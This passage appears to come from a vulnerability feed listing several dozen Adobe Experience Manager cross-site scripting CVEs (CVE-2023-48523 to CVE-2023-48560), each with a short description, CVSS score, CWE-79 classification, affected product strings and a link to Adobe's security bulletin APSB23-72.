Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48523
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48524

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:26:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48524
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48525

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:28:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48525
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48526

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:28:48

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48526
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48527

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:28:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48527
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48528

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48528
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48529

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48529
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48530

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48530
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48531

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48531
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48532

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48532
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48533

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:30:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48533
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48534

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48534
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48535

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48535
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48536

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:19

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48536
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48537

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:13

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48537
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48538

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:36:06

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48538
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48539

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:35:58

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48539
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48540

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:35:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48540
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48541

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:35:43

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48541
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48542

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:35:30

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48542
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48543

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:35:22

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48543
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48544

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:35:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48544
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48545

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:34:54

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48545
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48546

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:34:48

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48546
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48547

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:38

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48547
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48548

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48548
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48549

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:23

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48549
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48550

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48550
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48551

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:05

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48551
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48552

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:31:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48552
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48553

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:31:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48553
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48554

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:32:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48554
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48555

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:32:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48555
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48556

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:32:24

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48556
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48557

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:11:54

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48557
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48558

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:12:01

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48558
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48559

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:41:10

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48559
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48560

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:41:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48560
Source : psirt@adobe.com
